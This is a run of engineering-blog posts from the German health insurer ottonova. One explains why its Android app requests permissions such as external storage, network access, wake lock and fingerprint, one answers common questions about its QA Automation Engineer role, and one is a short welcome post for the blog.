Permissions name: android.permission.READ_EXTERNAL_STORAGE, android.permission.WRITE_EXTERNAL_STORAGE
Protection level: dangerous

Besides scanning a document on the spot, users may also want to upload a document from their phone storage, such as an image or a PDF. That’s why we require this permission: so we can read an imported file from external storage. It is not strictly necessary for uploading invoices, only for importing a file. We don’t scan the external storage; the feature calls the phone’s default file picker, and most file picker apps that ship with Android don’t actually require the calling app (ottonova in this case) to hold this permission, but unfortunately some do. Requesting it keeps the experience as smooth as possible for every user. Android 10 introduces changes here: an app will no longer have to request access to all of external storage and will be able to request access only to media folders.

Other app capabilities

Permissions name: android.permission.ACCESS_NETWORK_STATE, android.permission.ACCESS_WIFI_STATE, android.permission.INTERNET
Protection level: Normal

All of these permissions are related to internet access. INTERNET is needed so we can perform operations that require a connection; the other two let us know whether we’re connected to a network and whether we have internet access at all.

Permission name: android.permission.WAKE_LOCK
Protection level: Normal

This permission allows an app to keep the phone awake for a certain amount of time. In the ottonova app, it is used by our tracking library (Firebase by Google) to keep the phone awake while Firebase communicates with Google services to provide helpful app usage data to the server. Users can disable app usage tracking at any time under App settings > Notifications. If you disable tracking, this permission won’t be used at all.

Permission name: android.permission.USE_FINGERPRINT
Protection level: Normal

With the ottonova app, we have a PIN screen to keep your data safe. You can either enter a defined PIN or use your fingerprint to unlock the app.

Permissions name: RECEIVE, BIND_GET_INSTALL_REFERRER_SERVICE
Protection level: Normal (custom permission)

Both of these permissions are defined by Google. RECEIVE is used to receive push notifications, and BIND_GET_INSTALL_REFERRER_SERVICE is used by Firebase to recognize where the app was installed from.

Permission name: android.permission.FOREGROUND_SERVICE
Protection level: Normal

When a document is being uploaded, we use this permission so users can put the app in the background while we finish the upload. Whenever this permission is in use, a notification is always shown.


Permissions are becoming more transparent, and users are getting more control over what apps can do. These are vital improvements that help keep user data safe.
Still, we feel there are some improvements to be made in this field. For instance, external storage is still not a very safe place for sensitive data, because other apps can access it without system privileges just by requesting the external storage permission (this is starting to change with Android 10). That’s one of the reasons we don’t store any sensitive user data locally; all sensitive data is stored remotely on our servers. At ottonova we use only the bare minimum of permissions needed to make our app and services work, always keeping in mind potential vulnerabilities that could compromise our customers’ data.

We value transparency, that’s why we made this post.

We welcome changes made to improve app permissions and overall security regarding users’ data privacy. For example, Android 10 introduces new permission scopes for external storage access, meaning that apps will be able to request access just to media folders (e.g. the Images or Download folder). Also, although not used by ottonova, asking for location while in the background will require user permission. For further privacy changes in Android 10, see this link.


The QA Engineer position at ottonova

ottonova services GmbH
Some information about our QA Chapter and the QA Automation Engineer position at ottonova

This article gives some insights on the QA Engineer position here at ottonova. Since the position can be interpreted quite differently, we want to answer some common questions. Here we go.

1. Is test automation part of the QA activity? If yes, what experience in which programming languages and frameworks is required here?

Yes, test automation is a very important part of the role for us. For the automation of the web tests, we use Python and JavaScript.
The UI tests for the iOS and Android apps are implemented with Appium. Experience with classic patterns like the Page Object pattern and common CI tools like Jenkins or GitLab CI is also a big plus.

2. Exactly what kind of tests are performed and developed (acceptance testing, regression testing, UI testing, backend API testing…)?

Regression and acceptance tests are developed and executed. Developing and executing automated UI and backend tests is also part of our daily work.

3. Which applications are tested? The ottonova app? If so, are both versions (iOS and Android) tested?

In our QA team we test our various web applications as well as our mobile apps (iOS and Android).

4. How big is the development team and how many members does the test team consist of? How many releases would be tested per day? 

There are several engineering teams consisting of backend, frontend, mobile and QA engineers. The teams use Scrum and are organized cross-functionally. They therefore also include, for example, product owners or members of our insurance departments.

Each of our cross-functional teams has at least one dedicated QA Engineer.

6. What are the weekly working hours at ottonova? What further development opportunities do I have in your company in the area of QA?

We are flexible on all points and are happy to accommodate the wishes and ideas of applicants, both in terms of weekly hours and contract terms.

Working student contracts are limited to one year by default and have a fixed hourly wage. A permanent position after a student job (or internship) is always our highest goal.

In our employment contracts for a full-time position, there is always a probationary period of 6 months.

Development opportunities are individual to each employee; we support the realization of your goals wherever we can.

Welcome to our blog!

Hello everybody,

with this post we want to kick off the blog and also explain what it’s for.

With this blog we sincerely want to give you insights into how we create the software and platform behind ottonova, the first newly founded private health insurance in a long time.

We are assembling a strong and experienced IT team and are still growing, with a focus on everything it takes to create and run a fully digital health insurance: multi-platform software engineering, cloud infrastructure, quality assurance, data science, data security, and office IT.

Our idea is to regularly publish interesting articles about our work and how we organise ourselves.

Hopefully our content will be an inspiration to someone, in one way or another.

All the best and see you soon,
Jan 🚀